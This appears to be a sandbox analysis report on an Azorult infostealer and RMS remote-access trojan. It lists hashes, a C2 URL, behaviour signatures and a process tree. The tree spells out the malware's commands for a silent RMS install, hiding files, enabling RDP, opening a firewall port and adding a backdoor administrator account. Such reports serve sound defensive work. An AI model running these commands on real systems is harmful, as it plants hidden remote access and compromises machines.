Overview

overview

10

Static

static

5

AutoClicker-3.0.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    1800s
  • max time network
    1802s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12-10-2024 03:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AutoClicker-3.0.exe

  • Size

    844KB

  • MD5

    7ecfc8cd7455dd9998f7dad88f2a8a9d

  • SHA1

    1751d9389adb1e7187afa4938a3559e58739dce6

  • SHA256

    2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e

  • SHA512

    cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d

  • SSDEEP

    12288:GaWzgMg7v3qnCiWErQohh0F49CJ8lnybQg9BFg9UmTRHlM:BaHMv6CGrjBnybQg+mmhG

Score
10/10
azorultrmsagilenetaspackv2defense_evasiondiscoveryevasionexecutioninfostealerlateral_movementpersistenceprivilege_escalationrattrojanupx

Malware Config

Extracted

Family

azorult

C2

http://boglogov.site/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
    evasiontrojan
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • UAC bypass 3 TTPs 64 IoCs
    evasiontrojan
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

    lateral_movement
  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

    evasion
  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 23 IoCs
    evasion
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
    persistence
  • Sets file to hidden 1 TTPs 3 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Stops running service(s) 4 TTPs
    evasionexecution
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 62 IoCs
    discovery
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 64 IoCs
    evasiontrojan
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 1 IoCs
    persistence
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

    discovery
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 5 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
    defense_evasion
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 27 IoCs
  • Launches sc.exe 24 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies registry class 6 IoCs
  • NTFS ADS 64 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 21 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 64 IoCs
    evasion
  • Views/modifies file attributes 1 TTPs 6 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\AutoClicker-3.0.exe
    "C:\Users\Admin\AppData\Local\Temp\AutoClicker-3.0.exe"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    PID:872
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "C:\Users\Admin\Desktop\RestoreWait.dotx"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3180
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "C:\Users\Admin\Desktop\RestoreWait.dotx"
    1⤵
      PID:5964
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
      1⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1560
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd34fa3cb8,0x7ffd34fa3cc8,0x7ffd34fa3cd8
        2⤵
          PID:3156
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2
          2⤵
            PID:4904
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:5196
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2568 /prefetch:8
            2⤵
              PID:5464
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
              2⤵
                PID:396
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                2⤵
                  PID:4516
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
                  2⤵
                    PID:828
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
                    2⤵
                      PID:652
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
                      2⤵
                        PID:5784
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
                        2⤵
                          PID:2340
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
                          2⤵
                            PID:4996
                          • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:572
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
                            2⤵
                              PID:3812
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1
                              2⤵
                                PID:1292
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4772 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4284
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
                                2⤵
                                  PID:4192
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                                  2⤵
                                    PID:5992
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
                                    2⤵
                                      PID:4940
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
                                      2⤵
                                        PID:4340
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
                                        2⤵
                                          PID:1176
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1864,18015614633712799111,7760583816928851289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5924
                                      • C:\Windows\System32\CompPkgSrv.exe
                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                        1⤵
                                          PID:920
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:244
                                          • C:\Windows\System32\rundll32.exe
                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                            1⤵
                                              PID:5972
                                            • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe
                                              "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"
                                              1⤵
                                              • Modifies Windows Defender Real-time Protection settings
                                              • Blocks application from running via registry modification
                                              • Drops file in Drivers directory
                                              • Hide Artifacts: Hidden Users
                                              • Drops file in Program Files directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4764
                                              • C:\ProgramData\Microsoft\Intel\wini.exe
                                                C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
                                                2⤵
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4520
                                                • C:\Windows\SysWOW64\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
                                                  3⤵
                                                    PID:2524
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
                                                      4⤵
                                                        PID:4408
                                                        • C:\Windows\SysWOW64\regedit.exe
                                                          regedit /s "reg1.reg"
                                                          5⤵
                                                          • UAC bypass
                                                          • Windows security bypass
                                                          • Hide Artifacts: Hidden Users
                                                          • Runs .reg file with regedit
                                                          PID:3784
                                                        • C:\Windows\SysWOW64\regedit.exe
                                                          regedit /s "reg2.reg"
                                                          5⤵
                                                          • Runs .reg file with regedit
                                                          PID:3044
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout 2
                                                          5⤵
                                                          • Delays execution with timeout.exe
                                                          PID:3240
                                                        • C:\ProgramData\Windows\rutserv.exe
                                                          rutserv.exe /silentinstall
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:3136
                                                        • C:\ProgramData\Windows\rutserv.exe
                                                          rutserv.exe /firewall
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5904
                                                        • C:\ProgramData\Windows\rutserv.exe
                                                          rutserv.exe /start
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5880
                                                        • C:\Windows\SysWOW64\attrib.exe
                                                          ATTRIB +H +S C:\Programdata\Windows\*.*
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Views/modifies file attributes
                                                          PID:244
                                                        • C:\Windows\SysWOW64\attrib.exe
                                                          ATTRIB +H +S C:\Programdata\Windows
                                                          5⤵
                                                          • Views/modifies file attributes
                                                          PID:5996
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
                                                          5⤵
                                                          • Launches sc.exe
                                                          PID:3028
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc config RManService obj= LocalSystem type= interact type= own
                                                          5⤵
                                                          • Launches sc.exe
                                                          PID:5780
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc config RManService DisplayName= "Microsoft Framework"
                                                          5⤵
                                                          • Launches sc.exe
                                                          PID:5916
                                                    • C:\ProgramData\Windows\winit.exe
                                                      "C:\ProgramData\Windows\winit.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Checks processor information in registry
                                                      • Modifies registry class
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2596
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
                                                        4⤵
                                                          PID:5632
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout 5
                                                            5⤵
                                                            • Delays execution with timeout.exe
                                                            PID:5984
                                                    • C:\programdata\install\cheat.exe
                                                      C:\programdata\install\cheat.exe -pnaxui
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1376
                                                      • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4916
                                                        • C:\programdata\microsoft\intel\P.exe
                                                          C:\programdata\microsoft\intel\P.exe
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5440
                                                        • C:\programdata\microsoft\intel\R8.exe
                                                          C:\programdata\microsoft\intel\R8.exe
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Modifies registry class
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:4708
                                                          • C:\Windows\SysWOW64\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
                                                            5⤵
                                                              PID:3472
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
                                                                6⤵
                                                                • Modifies registry class
                                                                PID:1504
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im Rar.exe
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:876
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im Rar.exe
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1580
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout 3
                                                                  7⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:2004
                                                                • C:\Windows\SysWOW64\chcp.com
                                                                  chcp 1251
                                                                  7⤵
                                                                    PID:5912
                                                                  • C:\rdp\Rar.exe
                                                                    "Rar.exe" e -p555 db.rar
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:5908
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im Rar.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:396
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout 2
                                                                    7⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:4344
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                                                                    7⤵
                                                                      PID:5584
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                                                                        8⤵
                                                                          PID:2420
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            9⤵
                                                                              PID:5864
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                                                                              9⤵
                                                                                PID:4940
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                                                                                9⤵
                                                                                  PID:4216
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                                                                                  9⤵
                                                                                  • Modifies Windows Firewall
                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                  PID:1412
                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                  net.exe user "john" "12345" /add
                                                                                  9⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5540
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 user "john" "12345" /add
                                                                                    10⤵
                                                                                      PID:1052
                                                                                  • C:\Windows\SysWOW64\chcp.com
                                                                                    chcp 1251
                                                                                    9⤵
                                                                                      PID:3960
                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                      net localgroup "Администраторы" "John" /add
                                                                                      9⤵
                                                                                        PID:1796
                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                          C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                                                                                          10⤵
                                                                                            PID:2876
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net localgroup "Administratorzy" "John" /add
                                                                                          9⤵
                                                                                            PID:4272
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                                                                                              10⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3160
                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                            net localgroup "Administrators" John /add
                                                                                            9⤵
                                                                                              PID:4348
                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                                                                10⤵
                                                                                                  PID:5484
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                net localgroup "Administradores" John /add
                                                                                                9⤵
                                                                                                  PID:2756
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                                                                    10⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3116
                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                  net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                  9⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2532
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                    10⤵
                                                                                                      PID:5336
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net localgroup "Пользователи удаленного управления" John /add
                                                                                                    9⤵
                                                                                                      PID:5468
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                                                                                                        10⤵
                                                                                                          PID:5084
                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                        net localgroup "Remote Desktop Users" John /add
                                                                                                        9⤵
                                                                                                        • Remote Service Session Hijacking: RDP Hijacking
                                                                                                        PID:4244
                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                          C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                                                                                                          10⤵
                                                                                                          • Remote Service Session Hijacking: RDP Hijacking
                                                                                                          PID:1872
                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                        net localgroup "Usuarios de escritorio remoto" John /add
                                                                                                        9⤵
                                                                                                          PID:2936
                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                            C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                                                                                                            10⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3688
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                                          9⤵
                                                                                                            PID:3084
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                                              10⤵
